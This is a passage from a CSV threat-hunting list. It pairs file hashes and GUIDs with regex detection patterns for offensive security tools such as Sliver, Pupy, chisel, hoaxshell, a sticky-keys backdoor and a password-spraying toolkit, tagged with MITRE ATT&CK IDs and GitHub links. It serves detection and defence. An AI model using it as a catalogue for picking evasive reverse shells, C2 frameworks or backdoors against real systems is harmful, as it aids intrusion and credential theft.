T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*6b34ffba8e7ce5f0e5e7c157d7e65d320850c98de350d332421e8373aa9fa3a4*",".{0,1000}6b34ffba8e7ce5f0e5e7c157d7e65d320850c98de350d332421e8373aa9fa3a4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*6b3d229a02f91fbac23a4385a1b8ca8fe851c9c99c94341dfc5fda41cecc1283*",".{0,1000}6b3d229a02f91fbac23a4385a1b8ca8fe851c9c99c94341dfc5fda41cecc1283.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*6b4a7999ab5fa112e69ea99a01bcf41a23c8a01780f96eb1647fa98b80694113*",".{0,1000}6b4a7999ab5fa112e69ea99a01bcf41a23c8a01780f96eb1647fa98b80694113.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*6b6ae7b2bf3914eead08418884e8ad8121d7f5649424cf57888a884f1461f9a5*",".{0,1000}6b6ae7b2bf3914eead08418884e8ad8121d7f5649424cf57888a884f1461f9a5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*6b6aede14ee7f52374cf3fbc5d790afa32f23dc0791514ce26306514e4a22ee4*",".{0,1000}6b6aede14ee7f52374cf3fbc5d790afa32f23dc0791514ce26306514e4a22ee4.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*6b9093336ef9693a155bf5b514705424177b9d48679ddb809d18a75501c1041f*",".{0,1000}6b9093336ef9693a155bf5b514705424177b9d48679ddb809d18a75501c1041f.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" 
"*6b95cd81ca4f309ac9f243ae73d2e8099634aaffead5b7b214bfcd14b6d604f6*",".{0,1000}6b95cd81ca4f309ac9f243ae73d2e8099634aaffead5b7b214bfcd14b6d604f6.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*6BF82CF9845C649557FC02D1E3D0B6A9FB4F827CC7815BF477DD0CB51246DA45*",".{0,1000}6BF82CF9845C649557FC02D1E3D0B6A9FB4F827CC7815BF477DD0CB51246DA45.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","AD Enumeration","7","10","906","155","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*6c0f535128c8536421e213c4c1f55e4eaf690aaca78e34dc106994df1b48cf4b*",".{0,1000}6c0f535128c8536421e213c4c1f55e4eaf690aaca78e34dc106994df1b48cf4b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*6c44d6bfc218285f9f359e67c18bb652b16602dbcd524128a2a8996823a683ee*",".{0,1000}6c44d6bfc218285f9f359e67c18bb652b16602dbcd524128a2a8996823a683ee.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline separated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*6c66e4607984458f090c74149dcec7dac9e024d6e3f329cb85ae26e7b8d93d42*",".{0,1000}6c66e4607984458f090c74149dcec7dac9e024d6e3f329cb85ae26e7b8d93d42.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*6c6c37d26619bfe90a84e3e70c8dd45073488e120d239500bef10977f8523073*",".{0,1000}6c6c37d26619bfe90a84e3e70c8dd45073488e120d239500bef10977f8523073.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "*6c76fa94d001c749451ec29cb1ff39612c99eb3a06b81a043da5284d37a9dbed*",".{0,1000}6c76fa94d001c749451ec29cb1ff39612c99eb3a06b81a043da5284d37a9dbed.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - 
TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*6C8ECB51-EECE-49C3-89EC-CB0AAECCFF7E*",".{0,1000}6C8ECB51\-EECE\-49C3\-89EC\-CB0AAECCFF7E.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*6C9CF6A0-C098-4341-8DD1-2FCBA9594067*",".{0,1000}6C9CF6A0\-C098\-4341\-8DD1\-2FCBA9594067.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","N/A","10","5","452","69","2024-04-19T20:15:04Z","2023-07-24T13:59:16Z" "*6CAFC0C6-A428-4D30-A9F9-700E829FEA51*",".{0,1000}6CAFC0C6\-A428\-4D30\-A9F9\-700E829FEA51.{0,1000}","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*6ce5031943a475616dac98d91e84196abd59c8067542c442e995a0d5e46f89c2*",".{0,1000}6ce5031943a475616dac98d91e84196abd59c8067542c442e995a0d5e46f89c2.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*6cf8e628d3c3c765a55d482e7124e88f59a47949c8f677ba45b00aa0bbc7fd1a*",".{0,1000}6cf8e628d3c3c765a55d482e7124e88f59a47949c8f677ba45b00aa0bbc7fd1a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*6cfa69c4afc8b6bc2e33431b1d61210b51b3b5f204486dffe202d64a4ab73d3b*",".{0,1000}6cfa69c4afc8b6bc2e33431b1d61210b51b3b5f204486dffe202d64a4ab73d3b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*6cfa85f07f3c529fc3ca479c49104de7659010b3ca139ba6c10f7846c0ccf061*",".{0,1000}6cfa85f07f3c529fc3ca479c49104de7659010b3ca139ba6c10f7846c0ccf061.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*6d1e90be1c1fdcc12ccf00d729b42d5f028ea8bd6f372fa1075e43fe4ef506a6*",".{0,1000}6d1e90be1c1fdcc12ccf00d729b42d5f028ea8bd6f372fa1075e43fe4ef506a6.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*6d96904c0085f49b27a47e4d75542fe8d28b6de9431038d72fdfdb2f51e43171*",".{0,1000}6d96904c0085f49b27a47e4d75542fe8d28b6de9431038d72fdfdb2f51e43171.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*6d97644d0cc23ec724b2f6ec91ac273eedefd5d7f2c20b7b913b4e9ff582b183*",".{0,1000}6d97644d0cc23ec724b2f6ec91ac273eedefd5d7f2c20b7b913b4e9ff582b183.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*6da346eecac1a1bb11f834be0ef0b08539fb0f9ec7d8cc415ae9e301f53a536e*",".{0,1000}6da346eecac1a1bb11f834be0ef0b08539fb0f9ec7d8cc415ae9e301f53a536e.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*6dcf39d63a055602fdd1747fe84392641926ec16ed9aae3c136d2915ad83bdcf*",".{0,1000}6dcf39d63a055602fdd1747fe84392641926ec16ed9aae3c136d2915ad83bdcf.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*6e0055eba5cf62d9ac7b129e55d3f230fef2dd432d88313ae08d85d9ff5c2329*",".{0,1000}6e0055eba5cf62d9ac7b129e55d3f230fef2dd432d88313ae08d85d9ff5c2329.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*6e142c61b60e8590454a4ce20a8190bf07119ad5843457c9a46205ebea284fb3*",".{0,1000}6e142c61b60e8590454a4ce20a8190bf07119ad5843457c9a46205ebea284fb3.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" 
"*6e1611b4524f7426cbd8d7351b269a1239ee710e575e9e460fce110c35962de6*",".{0,1000}6e1611b4524f7426cbd8d7351b269a1239ee710e575e9e460fce110c35962de6.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*6e537702f0e29ddd6c134a1020396f42c30cd69da213d3fddfa645fc77c2449d*",".{0,1000}6e537702f0e29ddd6c134a1020396f42c30cd69da213d3fddfa645fc77c2449d.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*6e7645c4-32c5-4fe3-aabf-e94c2f4370e7*",".{0,1000}6e7645c4\-32c5\-4fe3\-aabf\-e94c2f4370e7.{0,1000}","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless Lateral Movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - 
Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","10","10","321","46","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z" "*6e909861781a8812ee01bc59435fd73fd34da23fa9ad6d699eefbf9f84629876*",".{0,1000}6e909861781a8812ee01bc59435fd73fd34da23fa9ad6d699eefbf9f84629876.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*6eabbccdf8fe27c93e5a87899fd2ef81bf1670ab65103b999559266d936acea3*",".{0,1000}6eabbccdf8fe27c93e5a87899fd2ef81bf1670ab65103b999559266d936acea3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*6EB55FE6-C11C-453B-8B32-22B689B6B3E2*",".{0,1000}6EB55FE6\-C11C\-453B\-8B32\-22B689B6B3E2.{0,1000}","offensive_tool_keyword","UnmanagedPowerShell","Executes PowerShell from an unmanaged process","T1059 - T1086","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/leechristensen/UnmanagedPowerShell","1","0","N/A","6","5","461","108","2016-03-17T05:20:55Z","2014-12-15T00:59:03Z" 
"*6ec665b1a7a7d7a63f8c92469d8bdd3365a8b98fe5f8093112cdfe2887a3a9c2*",".{0,1000}6ec665b1a7a7d7a63f8c92469d8bdd3365a8b98fe5f8093112cdfe2887a3a9c2.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*6ee5c663c74ab36046c1648d2ccc825c67e5d0104da08152d3d49f3482499567*",".{0,1000}6ee5c663c74ab36046c1648d2ccc825c67e5d0104da08152d3d49f3482499567.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*6ef5c10715019e5032c7cbb7c51d6e6bec069098ce76a1f83e7c45f250663f06*",".{0,1000}6ef5c10715019e5032c7cbb7c51d6e6bec069098ce76a1f83e7c45f250663f06.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*6f0f34a9afada52530634afb65d734b7121ad6c6d5690f708c7b4ff14572ada5*",".{0,1000}6f0f34a9afada52530634afb65d734b7121ad6c6d5690f708c7b4ff14572ada5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*6f1cd2444be1742a43e643df851e0d3dae010c782bd3e05f95b8cadd2c15ec18*",".{0,1000}6f1cd2444be1742a43e643df851e0d3dae010c782bd3e05f95b8cadd2c15ec18.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*6f2a53476cbc09bbffe7e07d6e9dd19d*",".{0,1000}6f2a53476cbc09bbffe7e07d6e9dd19d.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*6f305cfc78d9cc8ee0bdfe2b55d4469824a61d1ca519e1456bd0257f7decb48e*",".{0,1000}6f305cfc78d9cc8ee0bdfe2b55d4469824a61d1ca519e1456bd0257f7decb48e.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*6f46d85ab9aef2bf824b8714f29f9ff189a390c56294ab82308178e86fad472d*",".{0,1000}6f46d85ab9aef2bf824b8714f29f9ff189a390c56294ab82308178e86fad472d.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","file_hash","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*6f4889c2f3d0a774b4bb263ce776d06ead586b813d144ea38b0b9fdabac445d7*",".{0,1000}6f4889c2f3d0a774b4bb263ce776d06ead586b813d144ea38b0b9fdabac445d7.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" 
